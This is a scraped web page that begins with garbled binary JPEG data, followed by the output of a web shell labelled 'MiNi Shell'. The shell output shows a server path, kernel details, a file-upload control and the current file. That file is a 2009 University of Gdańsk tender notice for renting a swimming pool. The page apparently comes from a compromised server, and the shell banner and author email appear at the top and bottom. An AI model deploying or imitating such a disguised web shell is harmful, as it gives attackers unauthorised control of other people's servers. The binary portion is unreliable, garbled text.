JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091007/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091007/171013-N-2009.html

<p class="kh_header"><b>Gdańsk: Świadczenie usług  rekreacyjnych i sportowych polegających na korzystaniu przez grupy studentów i pracowników Uniwersytetu Gdańskiego z  pływalni ( basenu ), z wyłączeniem innych osób.</b><br>
<b>Numer ogłoszenia: 171013 - 2009; data zamieszczenia: 07.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet  Gdański , ul. Bażyńskiego 1A, 80-952 Gdańsk, woj. pomorskie, tel. 058 5232344, faks 058 5232484.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.univ.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług  rekreacyjnych i sportowych polegających na korzystaniu przez grupy studentów i pracowników Uniwersytetu Gdańskiego z  pływalni ( basenu ), z wyłączeniem innych osób..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia:
       Świadczenie usług  rekreacyjnych i sportowych polegających na korzystaniu przez grupy studentów i pracowników Uniwersytetu Gdańskiego z  pływalni (basenu), z wyłączeniem innych osób.
              Przedmiotem zamówienia jest w szczególności: zakup usługi wynajmu basenów publicznych, które podlegają nadzorowi instytucji ds. zdrowia, zgodnie z obowiązującym prawem i standardami, w szczególności rozporządzeniem Rady Ministrów z dnia 6 maja 1997 r. w sprawie określenia warunków bezpieczeństwa osób przebywających w górach, pływających, kąpiących się i uprawiających sporty wodne (Dz. U z dnia 7 czerwca 1997 r., Nr 57 poz. 358),spełniających poniższe warunki:
            - basen przeznaczony do nauki i doskonalenia pływania;
            - basen o minimalnej ilości torów - 5;
            - basen o minimalnej  długości torów - 25m;
            - obiekt  posiadający odpowiednią ilość miejsc parkingowych;
           - na basenie może jednorazowo przebywać 30 osób, podzielonych na 2 grupy;
           - korzystanie z szatni, suszarek, natrysków i dostępnego wyposażenia;
          - stała obserwacja przez ratownika lustra wody oraz osób znajdujących się na terenie basenów w czasie wynajętych godzin basenowych, stały  dozór  ratownika w czasie trwania zajęć prowadzonych na basenie.

2. Zakup usługi wynajmu basenu do zajęć prowadzonych ze studentami na basenie, od
    dnia podpisania umowy do dnia 2009-05-28.
    Godziny udostępnienia basenu  dla zorganizowanych grup studentów,  od      poniedziałku do piątku:
- poniedziałek od 16:40 do 19:20; 
- wtorek od 16:00 do 18:00; 
- środa od 16:00 do 17:20 i od 18:40 do 20:00;
- czwartek od 16:00 do 18:00.
Z wyłączeniem okresów przerw w nauce i dni wolnych.

Okresy w których nie będą odbywały się zajęcia:
a)	24.12.2009 - 03.01.2010
b)	  25.01.2010 - 14.02.2010
c)	02.04.2010 - 07.04.2010

3.  Zakup usługi wynajmu basenu dla pracowników Zamawiającego przez okres 6-  miesięcy, od 7 dnia po podpisaniu umowy.
      Zajęcia powinny odbywać się w cyklach (40 min.), trzy razy w tygodniu i nie mniej  niż 12 cykli w miesiącu. Łączna ilość cykli 72. 
       Dla niniejszej części przewiduje się godziny popołudniowe i wieczorne , w sobotę mogą być godziny poranne.
      Szczegółowy harmonogram godzin wynajmu basenu zostanie ustalony z wybranym wykonawcą i stanowić będzie załącznik do umowy, odpowiednio w każdej z części zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 92.61.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.05.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> IV. Opis warunków udziału w postępowaniu oraz opis sposobu  dokonywania oceny spełniania tych warunków.

1. Warunki udziału w postępowaniu oraz opis sposobu dokonywania oceny  spełniania tych warunków : 
    O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
         1.1. Posiadają uprawnienia do wykonywania działalności lub czynności określonej przedmiotem zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
    1.2. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia;
    1.3. Nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2  ustawy.
	
Ocena spełniania powyższych warunków zostanie dokonana wg formuły spełnia - nie spełnia  na podstawie dokumentów dołączonych do oferty.

Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem Wykonawcy   z postępowania  i odrzuceniem jego oferty.	


2.	Wykaz oświadczeń  i dokumentów jakie mają  dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu. 

        Zamawiający żąda od Wykonawców w celu potwierdzenia spełniania wymaganych warunków w postępowaniu oraz ustalenia osoby (osób) uprawnionej(nych) do ich reprezentowania, następujących niezbędnych oświadczeń i dokumentów:
         W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności objętych przedmiotem zamówienia oraz nie podlega wykluczeniu na podstawie art. 24 ustawy, do oferty należy dołączyć następujące dokumenty:
        2.1. Aktualny (umożliwiający identyfikację osób uprawnionych do składania oświadczeń woli w imieniu Wykonawcy) odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie  do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, dokument powinien być złożony w formie oryginału albo kopii poświadczonej za zgodność z oryginałem przez Wykonawcę (osoby upoważnione do składania oświadczeń woli w imieniu Wykonawcy), wystawione nie  wcześniej  niż  6 miesięcy przed upływem wyznaczonego terminu składania  ofert.
       W przypadku dwóch lub więcej przedsiębiorców (Wykonawców) składających wspólną ofertę (ubiegających się wspólnie o udzielenie zamówienia), każdy  z przedsiębiorców (Wykonawców) zobowiązany jest do dostarczenia ww. dokumentu.
        2. 2.  Oświadczenie o spełnianiu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 i art. 24 ust. 1 i 2 Prawa zamówień publicznych - załącznik nr 3 (do SIWZ),, podpisane przez osob(ę)y upoważnion(ą)e do składania oświadczeń woli w imieniu wykonawcy.
      W przypadku dwóch lub więcej przedsiębiorców (Wykonawców) składających wspólną   ofertę (ubiegających się wspólnie o udzielenie zamówienia), każdy z przedsiębiorców (Wykonawców) zobowiązany jest do dostarczenia ww. dokumentu.
          W celu potwierdzenia opisanego przez zamawiającego  warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, zamawiający może żądać  następujących dokumentów:
          2.3.  Dysponują  basenem publicznym z minimum  5 torami basenowymi na terenie Trójmiasta - wypełniony i podpisany załącznik nr 6 do SIWZ.
          2.4.  Dysponują minimum 1 osobą  posiadającą aktualne uprawnienia ratownika   poparte zaświadczeniem WOPR (kserokopia zaświadczenia)  -  wypełniony załącznik nr 5  do SIWZ. 
3 . Ofertę stanowią załączniki:
          3.1. Załącznik nr 1 - oferta (do SIWZ), formularz   ofertowy  wypełniony   i  podpisany, przez osob(ę)y upoważnion(ą)e do składania oświadczeń woli w imieniu wykonawcy. W przypadku dwóch lub więcej przedsiębiorców (Wykonawców) składających wspólną  ofertę (ubiegających się wspólnie o udzielenie zamówienia), jeden  z przedsiębiorców (Wykonawców) zobowiązany jest do dostarczenia ww. dokumentu, (upoważniony  przez pozostałych  jako ich reprezentant stosowną umową czy też pełnomocnictwem).

      3.2. Załącznik nr 2 (do SIWZ), kosztorys cenowy do oferty, z wyszczególnieniem zakresu poszczególnych  usług, wypełniony i podpisany przez osob(ę)y upoważnion(ą)e do składania oświadczeń woli w imieniu wykonawcy.
                 W przypadku dwóch lub więcej przedsiębiorców (Wykonawców) składających wspólną  ofertę (ubiegających się wspólnie o udzielenie zamówienia), jeden  z przedsiębiorców (Wykonawców) zobowiązany jest do dostarczenia ww. dokumentu, (upoważniony  przez pozostałych  jako ich reprezentant stosowną umową czy też pełnomocnictwem).

4.   Dokumenty i oświadczenia
        4.1.   Dokumenty mają być składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę (osoby upoważnione do składania oświadczeń woli w imieniu Wykonawcy)., Rozporządzenie Prezesa Rady Ministrów z dnia 19 maja 2006 r. § 4. (Dz. U. Nr 87, poz. 605).
                  Dokumenty muszą być wystawione zgodnie z terminami określonymi powyżej, przy czym ważny będzie również dokument wystawiony w okresie wcześniejszym,  jeżeli zostanie potwierdzony przez organ wydający w wymaganym terminie.
5.  Pełnomocnictwo
        5.1.  W przypadku gdy Wykonawcę reprezentuje pełnomocnik(nicy) (można wystawić jednorazowe pełnomocnictwo do danego konkretnego postępowania), do oferty musi być załączone pełnomocnictwo - (o ile pełnomocnictwo dla osób reprezentujących Wykonawcę  nie wynika z dokumentów rejestracyjnych) zawierające datę wystawienia, zakres upoważnienia, okres na które zostało wystawione oraz podpisane przez osoby reprezentujące osobę prawną  lub fizyczną.					
                 W przypadku złożenia kserokopii pełnomocnictwo musi być potwierdzone   
                 za zgodność z  oryginałem przez notariusza. 

6.   Okoliczności umożliwiające uzupełnianie oświadczeń i dokumentów wymaganych od wykonawców na potwierdzenie spełniania warunków udziału w postępowaniu.
        6.1.  Zamawiający wzywa Wykonawców , którzy w określonym terminie nie złożyli   wymaganych przez Zamawiającego oświadczeń  lub dokumentów, o których  mowa w art. 26, lub którzy nie  złożyli pełnomocnictw albo którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust.1, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba ze mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty  powinny  potwierdzać spełnianie przez Wykonawcę  warunków udziału w postępowaniu oraz spełnianie przez oferowane usługi  wymagań określonych przez Zamawiającego , nie później niż w dniu, w  którym upłynął termin składania ofert.
7.   Dopuszcza się składanie jednej oferty  przez dwóch lub więcej przedsiębiorców, pod warunkiem, że taka oferta będzie spełniać następujące wymagania:
          a) oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich przedsiębiorców występujących wspólnie,
          b)  przedsiębiorcy występujący wspólnie  muszą upoważnić jednego spośród siebie jako reprezentanta pozostałych, a jego upoważnienie musi być udokumentowane pełnomocnictwem  podpisanym przez upełnomocnionych przedstawicieli wszystkich pozostałych przedsiębiorców,
      c)  wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z przedsiębiorcą występującym jako reprezentant pozostałych.
Zamawiający przypomina o konieczności dostarczenia dokumentu ustanawiającego pełnomocnika, w przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, do reprezentowania ich w postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (art.23 ust.2 ustawy).
W przypadku gdy Wykonawcę reprezentuje pełnomocnik(nicy) (można wystawić jednorazowe pełnomocnictwo do danego konkretnego postępowania), do wniosku musi być załączone pełnomocnictwo, (o ile pełnomocnictwo dla osób reprezentujących Wykonawcę nie wynika z dokumentów rejestracyjnych) zawierające datę wystawienia, zakres upoważnienia, okres na które zostało wystawione oraz podpisane przez osoby reprezentujące osobę prawną  lub fizyczną. 												                         W przypadku złożenia kserokopii pełnomocnictwo musi być potwierdzone za zgodność z oryginałem przez notariusza.	

 8. Wykonawcy mający siedzibę  lub miejsce zamieszkania za granicą.
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, przedstawia dokumenty potwierdzające, że nie podlega wykluczeniu z postępowania o udzielenie zamówienia zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006r.§ 2 .1.
Nie spełnienie któregokolwiek z powyższych warunków spowoduje odrzucenie oferty..</li>
</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.univ.gda.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.univ.gda.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.10.2009 godzina 11:00, miejsce: Dział Zamówień Publicznych  Uniwersytetu Gdańskiego, 80-952 Gdańsk Oliwa,  ul. Bażyńskiego 1A.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com